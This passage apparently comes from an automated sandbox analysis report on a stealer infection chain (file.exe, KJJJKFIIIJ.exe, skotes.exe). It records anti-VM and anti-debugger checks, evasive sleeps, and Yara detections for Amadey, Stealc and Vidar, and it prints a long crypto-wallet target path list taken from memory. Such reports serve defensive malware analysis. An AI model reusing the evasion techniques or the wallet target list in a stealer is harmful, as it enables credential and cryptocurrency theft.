Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Special instruction interceptor: First address: BE9F39 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A7EDE0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A7ED17 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: C1E3FF instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: C2F87A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: A7ECE0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: CA9F39 instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

Code function: 16_2_04A206B3 rdtsc

16_2_04A206B3

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\file.exe TID: 7776	Thread sleep time: -48024s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7772	Thread sleep time: -50025s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7844	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7764	Thread sleep time: -58029s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7748	Thread sleep count: 43 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7748	Thread sleep time: -86043s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7756	Thread sleep count: 37 > 30	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7756	Thread sleep time: -74037s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 7752	Thread sleep time: -56028s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6064	Thread sleep count: 53 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6064	Thread sleep time: -1590000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6064	Thread sleep time: -30000s >= -30000s	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Last function: Thread delayed

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB6EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

0_2_6CB6EBF0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread delayed: delay time: 30000			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior

Source: skotes.exe, skotes.exe, 00000014.00000002.2651951754.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: CFBFCGID.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: discord.comVMware20,11696494690f
Source: CFBFCGID.0.dr	Binary or memory string: AMC password management pageVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: outlook.office.comVMware20,11696494690s
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
Source: CFBFCGID.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696494690d
Source: CFBFCGID.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696494690u
Source: CFBFCGID.0.dr	Binary or memory string: outlook.office365.comVMware20,11696494690t
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1975584108.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000014.00000002.2653686921.00000000012B9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000014.00000002.2653686921.000000000128A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: CFBFCGID.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696494690}
Source: CFBFCGID.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696494690x
Source: CFBFCGID.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
Source: CFBFCGID.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
Source: CFBFCGID.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696494690h
Source: CFBFCGID.0.dr	Binary or memory string: tasks.office.comVMware20,11696494690o
Source: file.exe, 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: iMSHN6QKQEMUh;=a
Source: CFBFCGID.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
Source: file.exe, 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: MSHN6QKQEMU
Source: skotes.exe, 00000014.00000002.2653686921.000000000129E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}yi
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: dev.azure.comVMware20,11696494690j
Source: CFBFCGID.0.dr	Binary or memory string: global block list test formVMware20,11696494690
Source: file.exe, 00000000.00000002.1975584108.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: CFBFCGID.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696494690t
Source: KJJJKFIIIJ.exe, 00000010.00000003.1975732936.0000000000906000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\P
Source: CFBFCGID.0.dr	Binary or memory string: bankofamerica.comVMware20,11696494690x
Source: CFBFCGID.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690}
Source: CFBFCGID.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696494690
Source: file.exe, 00000000.00000002.1971873574.0000000000781000.00000040.00000001.01000000.00000003.sdmp, KJJJKFIIIJ.exe, 00000010.00000002.2007017936.0000000000B42000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000011.00000002.2038364209.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000012.00000002.2037916036.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000014.00000002.2651951754.0000000000C02000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696494690]
Source: CFBFCGID.0.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696494690x
Source: CFBFCGID.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
Source: CFBFCGID.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696494690\|UE

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe

Code function: 16_2_04A206B3 rdtsc

16_2_04A206B3

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CC3AC62

Contains functionality to read the PEB

Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_0098652B mov eax, dword ptr fs:[00000030h]	16_2_0098652B
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Code function: 16_2_0098A302 mov eax, dword ptr fs:[00000030h]	16_2_0098A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A4A302 mov eax, dword ptr fs:[00000030h]	17_2_00A4A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 17_2_00A4652B mov eax, dword ptr fs:[00000030h]	17_2_00A4652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A4A302 mov eax, dword ptr fs:[00000030h]	18_2_00A4A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 18_2_00A4652B mov eax, dword ptr fs:[00000030h]	18_2_00A4652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A4A302 mov eax, dword ptr fs:[00000030h]	20_2_00A4A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 20_2_00A4652B mov eax, dword ptr fs:[00000030h]	20_2_00A4652B

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC3AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6CC3AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\KJJJKFIIIJ.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\KJJJKFIIIJ.exe "C:\Users\user\Documents\KJJJKFIIIJ.exe"	Jump to behavior
Source: C:\Users\user\Documents\KJJJKFIIIJ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

0_2_6CC84760

Source: C:\Users\user\Desktop\file.exe

0_2_6CB61C30

Source: file.exe, 00000000.00000002.1972169085.00000000007C7000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: KJJJKFIIIJ.exe, 00000010.00000002.2007325885.0000000000B83000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 00000011.00000002.2038651683.0000000000C43000.00000040.00000001.01000000.0000000E.sdmp, skotes.exe, 00000012.00000002.2038172550.0000000000C43000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: cProgram Manager

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC3AE71 cpuid

0_2_6CC3AE71

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1012783001\5762ea743c.exe VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CC3A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6CC3A8DC

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 20_2_00A165E0 LookupAccountNameA,

20_2_00A165E0

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 20_2_00A52517 GetTimeZoneInformation,

20_2_00A52517

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6CB88390 NSS_GetVersion,

0_2_6CB88390

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 17.2.skotes.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 18.2.skotes.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.skotes.exe.a10000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.KJJJKFIIIJ.exe.950000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000002.2037822618.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2037351297.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.2651137174.0000000000A11000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.2006010941.0000000000951000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.3a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1975584108.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1970779986.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7688, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.\|0\|
Source: file.exe, 00000000.00000002.1975584108.0000000000FA4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx 